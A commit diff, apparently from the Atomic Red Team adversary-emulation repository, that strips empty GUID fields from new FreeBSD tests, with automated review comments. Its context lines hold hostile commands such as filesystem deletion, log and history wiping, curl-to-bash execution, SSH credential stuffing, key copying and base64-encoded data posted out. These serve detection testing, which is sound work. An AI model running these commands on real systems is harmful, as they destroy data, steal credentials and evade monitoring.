Remove auto_generated_guid lines from new entries

Some other tiny modifications
Alonso Cárdenas
2023-06-09 09:11:41 -05:00
parent 74e8721392
commit 3b8d0af302
49 changed files with 1 additions and 85 deletions
-1
@@ -49,7 +49,6 @@ atomic_tests:
rm -f "#{output_file}"
- name: Dump individual process memory with sh on FreeBSD (Local)
auto_generated_guid:
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
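Review bot: Dropping the empty `auto_generated_guid:` key is only safe if the repository's GUID generation step fills it in after merge; a new test with no GUID has no stable identifier for runners or detection mappings to reference. Please confirm that generator runs for these files, since the same removal is applied to every new FreeBSD entry in this commit.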
-1
@@ -21,7 +21,6 @@ atomic_tests:
name: bash
elevation_required: true
- name: Access /etc/master.passwd (Local)
auto_generated_guid:
description: |
/etc/master.passwd file is accessed in FreeBSD environments
supported_platforms:
-1
@@ -46,7 +46,6 @@ atomic_tests:
systemctl --type=service
name: bash
- name: System Service Discovery - service
auto_generated_guid:
description: |
Enumerates system service using service
supported_platforms:
-1
@@ -54,7 +54,6 @@ atomic_tests:
if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
name: sh
- name: System Network Configuration Discovery (freebsd)
auto_generated_guid:
description: |
Identify network configuration information.
-1
@@ -283,7 +283,6 @@ atomic_tests:
name: sh
- name: Remote System Discovery - netstat
auto_generated_guid:
description: |
Use the netstat command to display the kernels routing tables.
supported_platforms:
-1
@@ -34,7 +34,6 @@ atomic_tests:
rm /tmp/art.sh
name: sh
- name: Decode base64 Data into Script
auto_generated_guid:
description: |
Creates a base64-encoded data file and decodes it into an executable shell script
-1
@@ -34,7 +34,6 @@ atomic_tests:
cleanup_command:
rm -rf /tmp/atomic-test-T1036.006
- name: Space After Filename (FreeBSD)
auto_generated_guid:
description: |
Space after filename.
supported_platforms:
-1
@@ -54,7 +54,6 @@ atomic_tests:
cleanup_command: |
origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
- name: rc.local (FreeBSD)
auto_generated_guid:
description: |
Modify rc.local
-3
@@ -29,7 +29,6 @@ atomic_tests:
name: bash
elevation_required: true
- name: Packet Capture FreeBSD using tshark or tcpdump
auto_generated_guid:
description: |
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
@@ -248,7 +247,6 @@ atomic_tests:
name: bash
elevation_required: true
- name: Packet Capture FreeBSD using /dev/bpfN with sudo
auto_generated_guid:
description: |
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
supported_platforms:
@@ -282,7 +280,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
auto_generated_guid:
description: |
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
supported_platforms:
-1
@@ -69,7 +69,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Port Scan Nmap for FreeBSD
auto_generated_guid:
description: |
Scan ports to check for listening ports with Nmap.
-1
@@ -219,7 +219,6 @@ atomic_tests:
command: |
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
- name: Python3 http.server (freebsd)
auto_generated_guid:
description: |
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
supported_platforms:
-1
@@ -55,7 +55,6 @@ atomic_tests:
command: |-
echo "#{at_command}" | at #{time_spec}
- name: At - Schedule a job freebsd
auto_generated_guid:
description: |
This test submits a command to be run in the future by the `at` daemon.
-1
@@ -55,7 +55,6 @@ atomic_tests:
rm /etc/cron.monthly/#{cron_script_name}
rm /etc/cron.weekly/#{cron_script_name}
- name: Cron - Add script to /etc/cron.d folder
auto_generated_guid:
description: |
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
supported_platforms:
-1
@@ -88,7 +88,6 @@ atomic_tests:
cleanup_command: |
unset PROMPT_COMMAND
- name: Logging sh history to syslog/messages
auto_generated_guid:
description: |
There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.
-4
@@ -169,7 +169,6 @@ atomic_tests:
echo -n "$ART" |base64 -d |/bin/bash
unset ART
- name: Obfuscated command line scripts (freebsd)
auto_generated_guid:
description: |
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
supported_platforms:
@@ -206,7 +205,6 @@ atomic_tests:
cleanup_command: |
userdel art
- name: Change login shell (freebsd)
auto_generated_guid:
description: |
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
supported_platforms:
@@ -243,7 +241,6 @@ atomic_tests:
cleanup_command: |
unset ART
- name: Environment variable scripts (freebsd)
auto_generated_guid:
description: |
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
supported_platforms:
@@ -290,7 +287,6 @@ atomic_tests:
rm /tmp/art.txt
- name: Detecting pipe-to-shell (freebsd)
auto_generated_guid:
description: |
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
supported_platforms:
+1 -6
@@ -15,7 +15,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: rm -rf
auto_generated_guid:
description: |
Delete messages and security logs
supported_platforms:
@@ -52,7 +51,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility (freebsd)
auto_generated_guid:
description: |
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
supported_platforms:
@@ -77,7 +75,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
auto_generated_guid:
description: |
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
supported_platforms:
@@ -114,7 +111,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Overwrite FreeBSD system log via echo utility
auto_generated_guid:
description: |
This test overwrites the contents of system log file with an empty string using echo utility
supported_platforms:
@@ -148,11 +144,10 @@ atomic_tests:
name: sh
elevation_required: true
- name: Delete system log files via unlink utility (freebsd)
auto_generated_guid:
description: |
This test deletes the messages log file using unlink utility
supported_platforms:
- macos
- freebsd
executor:
command: |
unlink /var/log/messages
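Review bot: The line counts on this hunk (11 old, 10 new) show a second change beyond the `auto_generated_guid:` removal, inside the `supported_platforms` block of 'Delete system log files via unlink utility (freebsd)', which now reads `- macos` followed by `- freebsd`. Since the test name and the `unlink /var/log/messages` command target FreeBSD, confirm that macos is meant to remain in the platform list, and spell the platform change out in the commit message rather than leaving it under "some other tiny modifications".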
-7
@@ -13,7 +13,6 @@ atomic_tests:
rm ~/.bash_history
name: sh
- name: Clear sh history (rm)
auto_generated_guid:
description: |
Clears sh history via rm
supported_platforms:
@@ -34,7 +33,6 @@ atomic_tests:
echo "" > ~/.bash_history
name: sh
- name: Clear sh history (echo)
auto_generated_guid:
description: |
Clears sh history via echo
supported_platforms:
@@ -55,7 +53,6 @@ atomic_tests:
cat /dev/null > ~/.bash_history
name: sh
- name: Clear sh history (cat dev/null)
auto_generated_guid:
description: |
Clears sh history via cat /dev/null
supported_platforms:
@@ -77,7 +74,6 @@ atomic_tests:
ln -sf /dev/null ~/.bash_history
name: sh
- name: Clear sh history (ln dev/null)
auto_generated_guid:
description: |
Clears sh history via a symlink to /dev/null
supported_platforms:
@@ -97,7 +93,6 @@ atomic_tests:
truncate -s0 ~/.bash_history
name: sh
- name: Clear sh history (truncate)
auto_generated_guid:
description: |
Clears sh history via truncate
supported_platforms:
@@ -120,7 +115,6 @@ atomic_tests:
history -c
name: sh
- name: Clear history of a bunch of shells (freebsd)
auto_generated_guid:
description: |
Clears the history of a bunch of different shell types by setting the history size to zero
supported_platforms:
@@ -188,7 +182,6 @@ atomic_tests:
name: sh
- name: Disable sh History Logging with SSH -T (freebsd)
auto_generated_guid:
description: |
Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
supported_platforms:
-1
@@ -178,7 +178,6 @@ atomic_tests:
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
name: bash
- name: Delete Filesystem - FreeBSD
auto_generated_guid:
description: |
This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
supported_platforms:
-1
@@ -36,7 +36,6 @@ atomic_tests:
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file}
name: bash
- name: Stage data from Discovery.sh (freebsd)
auto_generated_guid:
description: |
Utilize curl to download discovery.sh and execute a basic information gathering shell script
supported_platforms:
-3
@@ -119,7 +119,6 @@ atomic_tests:
cleanup_command: |
userdel -r art
- name: Create local account (FreeBSD)
auto_generated_guid:
description: |
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
supported_platforms:
@@ -158,7 +157,6 @@ atomic_tests:
cleanup_command: |
userdel -r art
- name: Reactivate a locked/expired account (FreeBSD)
auto_generated_guid:
description: |
A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate.
@@ -202,7 +200,6 @@ atomic_tests:
cat /etc/passwd |grep nobody
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- name: Login as nobody (freebsd)
auto_generated_guid:
description: |
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
supported_platforms:
-2
@@ -81,7 +81,6 @@ atomic_tests:
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
name: bash
- name: FreeBSD VM Check via Kernel Modules
auto_generated_guid:
description: |
Identify virtual machine host kernel modules.
supported_platforms:
@@ -363,7 +362,6 @@ atomic_tests:
grep vmw /proc/modules
name: sh
- name: FreeBSD List Kernel Modules
auto_generated_guid:
description: |
Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
supported_platforms:
-1
@@ -110,7 +110,6 @@ atomic_tests:
rm -f #{output_file}
name: sh
- name: Show if a user account has ever logged in remotely (freebsd)
auto_generated_guid:
description: |
Show if a user account has ever logged in remotely
supported_platforms:
-1
@@ -116,7 +116,6 @@ atomic_tests:
killall tor > /dev/null 2>&1
name: sh
- name: Tor Proxy Usage - FreeBSD
auto_generated_guid:
description: |
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy service will be launched.
-1
@@ -226,7 +226,6 @@ atomic_tests:
userdel -fr art
- name: SUDO Brute Force - FreeBSD
auto_generated_guid:
description: |
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
-1
@@ -64,7 +64,6 @@ atomic_tests:
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
- name: SSH Credential Stuffing From FreeBSD
auto_generated_guid:
description: |
Using username,password combination from a password dump to login over SSH.
-2
@@ -70,7 +70,6 @@ atomic_tests:
rm #{output_file}
name: bash
- name: X Windows Capture (freebsd)
auto_generated_guid:
description: |
Use xwd command to collect a full desktop screenshot and review file with xwud
supported_platforms:
@@ -122,7 +121,6 @@ atomic_tests:
rm #{output_file}
name: bash
- name: Capture Linux Desktop using Import Tool (freebsd)
auto_generated_guid:
description: |
Use import command from ImageMagick to collect a full desktop screenshot
supported_platforms:
-1
@@ -23,7 +23,6 @@ atomic_tests:
curl -XPOST #{base64_data}.#{destination_url}
name: sh
- name: Base64 Encoded data (freebsd)
auto_generated_guid:
description: |
Utilizing a common technique for posting base64 encoded data.
supported_platforms:
-1
@@ -47,7 +47,6 @@ atomic_tests:
name: bash
elevation_required: true
- name: Network Share Discovery - FreeBSD
auto_generated_guid:
description: |
Network Share Discovery using smbstatus
supported_platforms:
-2
@@ -20,7 +20,6 @@ atomic_tests:
name: bash
elevation_required: true
- name: Create a user account on a FreeBSD system
auto_generated_guid:
description: |
Create a user via pw
supported_platforms:
@@ -130,7 +129,6 @@ atomic_tests:
name: bash
elevation_required: true
- name: Create a new user in FreeBSD with `root` GID.
auto_generated_guid:
description: |
Creates a new user in FreeBSD and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign.
supported_platforms:
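Review bot: The test name 'Create a new user in FreeBSD with `root` GID.' ends with a trailing period, unlike every other name in this commit; drop it so generated docs and runner listings stay consistent.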
-2
@@ -139,7 +139,6 @@ atomic_tests:
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"
- name: Base64 decoding with shell utilities (freebsd)
auto_generated_guid:
description: |
Use common shell utilities to decode a base64-encoded text string and echo it to the console
supported_platforms:
@@ -166,7 +165,6 @@ atomic_tests:
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r
- name: FreeBSD b64encode Shebang in CLI
auto_generated_guid:
description: |
Using b64decode shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it.
supported_platforms:
-1
@@ -12,7 +12,6 @@ atomic_tests:
cat /etc/pam.d/common-password
name: bash
- name: Examine password complexity policy - FreeBSD
auto_generated_guid:
description: |
Lists the password complexity policy to console on FreeBSD.
supported_platforms:
-1
@@ -57,7 +57,6 @@ atomic_tests:
rm -f #{output_file} 2>/dev/null
name: sh
- name: List Google Chromium Bookmark JSON Files on FreeBSD
auto_generated_guid:
description: |
Searches for Google Chromium's Bookmark file (on FreeBSD) that contains bookmarks in JSON format and lists any found instances to a text file.
supported_platforms:
-3
@@ -192,7 +192,6 @@ atomic_tests:
chattr -i #{file_to_modify}
name: sh
- name: chflags - Remove immutable file attribute
auto_generated_guid:
description: |
Remove's a file's `immutable` attribute using `chflags`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
@@ -238,7 +237,6 @@ atomic_tests:
#{compiled_file} /tmp/ T1222002
name: sh
- name: Chmod through c script (freebsd)
auto_generated_guid:
description: |
chmods a file using a c script
supported_platforms:
@@ -295,7 +293,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Chown through c script (freebsd)
auto_generated_guid:
description: |
chowns a file to root using a c script
supported_platforms:
-1
@@ -16,7 +16,6 @@ atomic_tests:
if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
- name: Detect Virtualization Environment (FreeBSD)
auto_generated_guid:
description: |
Detects execution in a virtualized environment.
At boot, dmesg stores a log if a hypervisor is detected.
-1
@@ -64,7 +64,6 @@ atomic_tests:
ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'
name: sh
- name: Security Software Discovery - pgrep (FreeBSD)
auto_generated_guid:
description: |
Methods to identify Security Software on an endpoint
when sucessfully executed, command shell is going to display AV/Security software it is running.
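Review bot: Typo in the description context of 'Security Software Discovery - pgrep (FreeBSD)': 'sucessfully' should be 'successfully', and the second sentence should start with a capital letter; since this block is already being edited, fold that fix into the same commit.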
-2
@@ -95,7 +95,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Reboot System via `halt` - FreeBSD
auto_generated_guid:
description: |
This test restarts a FreeBSD system using `halt`.
supported_platforms:
@@ -129,7 +128,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Reboot System via `poweroff` - FreeBSD
auto_generated_guid:
description: |
This test restarts a FreeBSD system using `poweroff`.
supported_platforms:
-1
@@ -66,7 +66,6 @@ atomic_tests:
systemctl daemon-reload
name: bash
- name: Create Systemd Service
auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c
description: |
This test creates a Systemd service unit file and enables it as a service.
supported_platforms:
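Review bot: This hunk removes a populated GUID (`d9e4f24f-aa67-4c6e-bcbf-85622b697a7c`) from 'Create Systemd Service', which is an existing test rather than one of the new FreeBSD entries the commit message describes. Stripping a real GUID breaks anything that references this test by identifier and will cause the generator to assign a different one; restore the line `auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c` and limit the removal to entries whose value is empty.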
-1
@@ -40,7 +40,6 @@ atomic_tests:
mv /tmp/T1546.004 ~/.bashrc
name: sh
- name: Add command to .shrc
auto_generated_guid:
description: |
Adds a command to the .shrc file of the current user
supported_platforms:
-2
@@ -16,7 +16,6 @@ atomic_tests:
rm -f /tmp/art-fish.txt
name: sh
- name: Trap EXIT (freebsd)
auto_generated_guid:
description: |
Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
@@ -51,7 +50,6 @@ atomic_tests:
rm -f /tmp/art-fish.txt
name: sh
- name: Trap SIGINT (freebsd)
auto_generated_guid:
description: |
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
-3
@@ -27,7 +27,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Make and modify binary from C source (freebsd)
auto_generated_guid:
description: |
Make, change owner, and change file attributes on a C source code file
supported_platforms:
@@ -72,7 +71,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Set a SetUID flag on file (freebsd)
auto_generated_guid:
description: |
This test sets the SetUID flag on a file in FreeBSD.
supported_platforms:
@@ -113,7 +111,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Set a SetGID flag on file (freebsd)
auto_generated_guid:
description: |
This test sets the SetGID flag on a file in FreeBSD.
supported_platforms:
-3
@@ -21,7 +21,6 @@ atomic_tests:
sudo vim /etc/sudoers
- name: Sudo usage (freebsd)
auto_generated_guid:
description: |
Common Sudo enumeration methods.
@@ -63,7 +62,6 @@ atomic_tests:
sudo visudo -c -f /etc/sudoers
- name: Unlimited sudo cache timeout (freebsd)
auto_generated_guid:
description: |
Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
@@ -104,7 +102,6 @@ atomic_tests:
sudo visudo -c -f /etc/sudoers
- name: Disable tty_tickets for sudo caching (freebsd)
auto_generated_guid:
description: |
Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
-1
@@ -26,7 +26,6 @@ atomic_tests:
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
name: sh
- name: Search Through sh History
auto_generated_guid:
description: |
Search through sh history for specifice commands we want to capture
supported_platforms:
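Review bot: 'specifice' in the description of 'Search Through sh History' should be 'specific'; worth fixing while this block is touched.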
-3
@@ -61,7 +61,6 @@ atomic_tests:
rm -rf #{output_folder}
name: sh
- name: Copy Private SSH Keys with CP (freebsd)
auto_generated_guid:
description: |
Copy private SSH keys on a FreeBSD system to a staging folder using the `cp` command.
supported_platforms:
@@ -113,7 +112,6 @@ atomic_tests:
rm -rf #{output_folder}
name: sh
- name: Copy Private SSH Keys with rsync (freebsd)
auto_generated_guid:
description: |
Copy private SSH keys on a FreeBSD system to a staging folder using the `rsync` command.
supported_platforms:
@@ -167,7 +165,6 @@ atomic_tests:
rm -rf #{output_folder}
name: sh
- name: Copy the users GnuPG directory with rsync (freebsd)
auto_generated_guid:
description: |
Copy the users GnuPG (.gnupg) directory on a FreeBSD system to a staging folder using the `rsync` command.
supported_platforms:
-1
@@ -28,7 +28,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Install root CA on FreeBSD
auto_generated_guid:
description: |
Creates a root CA with openssl
supported_platforms:
-1
@@ -30,7 +30,6 @@ atomic_tests:
cleanup_command: |
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
- name: Malicious PAM rule (freebsd)
auto_generated_guid:
description: |
Inserts a rule into a PAM config and then tests it.
-1
@@ -40,7 +40,6 @@ atomic_tests:
name: sh
elevation_required: true
- name: Disable syslog (freebsd)
auto_generated_guid:
description: |
Disables syslog collection
supported_platforms:
-3
@@ -19,7 +19,6 @@ atomic_tests:
#{evil_command}
name: sh
- name: Disable history collection (freebsd)
auto_generated_guid:
description: |
Disables history collection in shells
supported_platforms:
@@ -119,7 +118,6 @@ atomic_tests:
cleanup_command: |
export HISTCONTROL=$(echo $TEST)
- name: Setting the HISTSIZE environment variable
auto_generated_guid:
description: |
An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
@@ -157,7 +155,6 @@ atomic_tests:
cleanup_command: |
export HISTFILE=$(echo $TEST)
- name: Setting the HISTFILE environment variable (freebsd)
auto_generated_guid:
description: |
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
-2
@@ -113,7 +113,6 @@ atomic_tests:
ufw enable
ufw status verbose
- name: Stop/Start Packet Filter
auto_generated_guid:
description: |
Stop the Packet Filter if installed.
supported_platforms:
@@ -209,7 +208,6 @@ atomic_tests:
{ echo y; echo response; } | ufw delete 1
ufw status numbered
- name: Add and delete Packet Filter rules
auto_generated_guid:
description: |
Add and delete a rule on the Packet Filter (PF) if installed and enabled.
supported_platforms:
-2
@@ -38,7 +38,6 @@ atomic_tests:
name: bash
elevation_required: true
- name: 'Auditing Configuration Changes on FreeBSD Host'
auto_generated_guid:
description: |
Emulates modification of auditd configuration files
supported_platforms:
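Review bot: The test names in this file are single-quoted ('Auditing Configuration Changes on FreeBSD Host') while every other new entry in the commit uses bare scalars; both are valid YAML, but matching the rest of the atomics would be cleaner.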
@@ -98,7 +97,6 @@ atomic_tests:
name: bash
elevation_required: true
- name: 'Logging Configuration Changes on FreeBSD Host'
auto_generated_guid:
description: |
Emulates modification of syslog configuration.
supported_platforms: